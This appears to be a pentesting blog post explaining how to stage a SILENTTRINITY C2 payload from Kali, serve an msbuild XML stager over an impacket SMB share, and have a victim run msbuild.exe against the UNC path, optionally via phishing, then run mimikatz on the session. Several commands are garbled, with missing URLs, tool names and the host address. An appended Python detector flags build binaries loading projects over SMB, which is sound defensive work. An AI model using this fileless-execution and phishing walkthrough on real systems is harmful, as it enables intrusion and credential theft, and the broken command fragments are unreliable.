The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

There’s been a disturbance in pentesting, have you felt it? More mature environments have finally caught on that PowerShell can be used for malicious gains and that pentesters could own your domain with a few PowerShell commands. Admins have begun to lock it down and EDRs have begun to alert, and, as the saying goes, necessity is the mother of invention. Exit PowerShell, enter C#.

So why C#? Simply put, it has access to the .NET Framework like PowerShell does. The other big reason is that Microsoft ships unsigned executables that will compile and execute C# code, and those unsigned executables are installed by default with the .NET Framework, which means they are everywhere. Matt Graeber found one of the executables and did an excellent write-up of it here. The TL;DR of it is that Microsoft.Workflow.Compiler.exe, which is installed as part of the .NET Framework, will run C# code that is in a XOML file. There’s been a huge movement to use LOL (living off the land) tactics, meaning use what you have at your disposal instead of downloading things to victim machines, so this is huge. Of course, people immediately started to look at how to weaponize this, as msbuild.exe was another binary that would compile and run C# code. byt3bl33d3r, who wrote crackmapexec, Empire, and Deathstar, developed a tool called SILENTTRINITY, which utilizes IronPython to create the C# code in Python, then generates the XML file needed by msbuild (if using that payload option). This is how it works:

Using Kali, install Python3

apt-get install python3.7
apt-get install python3.7-dev


git clone

Then install the requirements.

python3.7 -m pip install -r requirements.txt


cd Server

Before starting SILENTTRINITY we’ll spin up a Samba server so that we don’t have to drop files to disk on the target and instead fetch the payload via SMB path. To do this, impacket has a set of tools in their github repository here, one of which is which will spin up a quick SMB server.

First download & install the impacket repository

git clone 

cd impacket

pip install -r requirements.txt

python install

Then create a folder that will be shared

mkdir /root/SMB

Then run Since it was ‘installed’ it can be run anywhere via -smb2support SMB /root/SMB




You should then be seeing this


Next is to spin up an HTTP listener, as shown below.


Once that is spun up, next is to generate the actual stager, which is what will be executed. In this case, we’re using msbuild.


The XML file is generated in the same directory as, so copy that to the Samba share that was made which in this case is at /root/SMB.

cp msbuild.xml /root/SMB


Finally, the trick now is to get the victim to execute the xml file via SMB path. Of course this is easy if you already have a shell on the machine, otherwise it’s possible to embed this link in a phishing email.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\\SMB\msbuild.xml


You’ll see a command prompt open up and if you look back at SILENTTRINITY, you’ll have a session.


And to list the sessions:


Now you can use modules against that session, like in Empire


e.g. mimikatz


The purpose of this is to show that you never have to drop files to disk and can actually execute code remotely, in memory, by using SMB and binaries that exist on most current Windows deployments. The interesting thing is that this isn’t a bug in msbuild.exe or Microsoft.Workflow.Compiler.exe; those binaries are meant to do this, and we’re just exploiting it for offensive purposes.
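Because nothing is written to disk, the process command line is the most reliable place to catch this. The following is an added example for defenders, not code from the original post or from SILENTTRINITY: it flags msbuild.exe or Microsoft.Workflow.Compiler.exe being handed a project file over a UNC path. The event field names (`host`, `cmdline`), the host names and the 192.0.2.10 address are constructed for illustration.

```python
import re

# Binaries named on this page that compile and run C# from an XML/XOML file.
BUILD_LOLBINS = {"msbuild.exe", "microsoft.workflow.compiler.exe"}

# Image path (optionally quoted) followed by the rest of the command line.
IMAGE_RE = re.compile(r'^\s*"?(.+?\.exe)(?=["\s]|$)"?\s*(.*)$', re.IGNORECASE)
# A UNC path (\\host\share\...) appearing as, or inside, an argument.
UNC_RE = re.compile(r'(?:^|[\s"=])(\\\\[^\\\s"]+\\[^\s"]+)')

# Constructed process-creation events (assumed field names, not from a real host).
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline": r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\192.0.2.10\SMB\msbuild.xml'},
    {"host": "DEV07", "cmdline": r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\src\app\app.csproj /t:Build'},
    {"host": "WS02", "cmdline": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe" \\192.0.2.10\SMB\run.xml results.xml'},
    {"host": "WS03", "cmdline": r'C:\Windows\System32\notepad.exe \\192.0.2.10\SMB\notes.txt'},
    {"host": "WS04", "cmdline": r'c:\windows\microsoft.net\framework\v4.0.30319\MSBuild.EXE /nologo "\\build-share.example\drop\proj.xml"'},
]

def remote_project(cmdline):
    """Return (binary, unc_path) if a build LOLBin is given a UNC path, else None."""
    m = IMAGE_RE.match(cmdline)
    if not m:
        return None
    # Compare on the lower-cased file name so path and case tricks do not matter.
    binary = m.group(1).replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if binary not in BUILD_LOLBINS:
        return None
    unc = UNC_RE.search(m.group(2))
    return (binary, unc.group(1)) if unc else None

def detect(events):
    """Return one finding per event where the project file is loaded over SMB."""
    findings = []
    for ev in events:
        hit = remote_project(ev["cmdline"])
        if hit:
            findings.append({"host": ev["host"], "binary": hit[0], "source": hit[1]})
    return findings

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['binary']} loaded project from {f['source']}")
```

A legitimate build server that pulls projects from an internal share will match the same rule, so in practice pair it with an allow-list of expected source hosts.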






















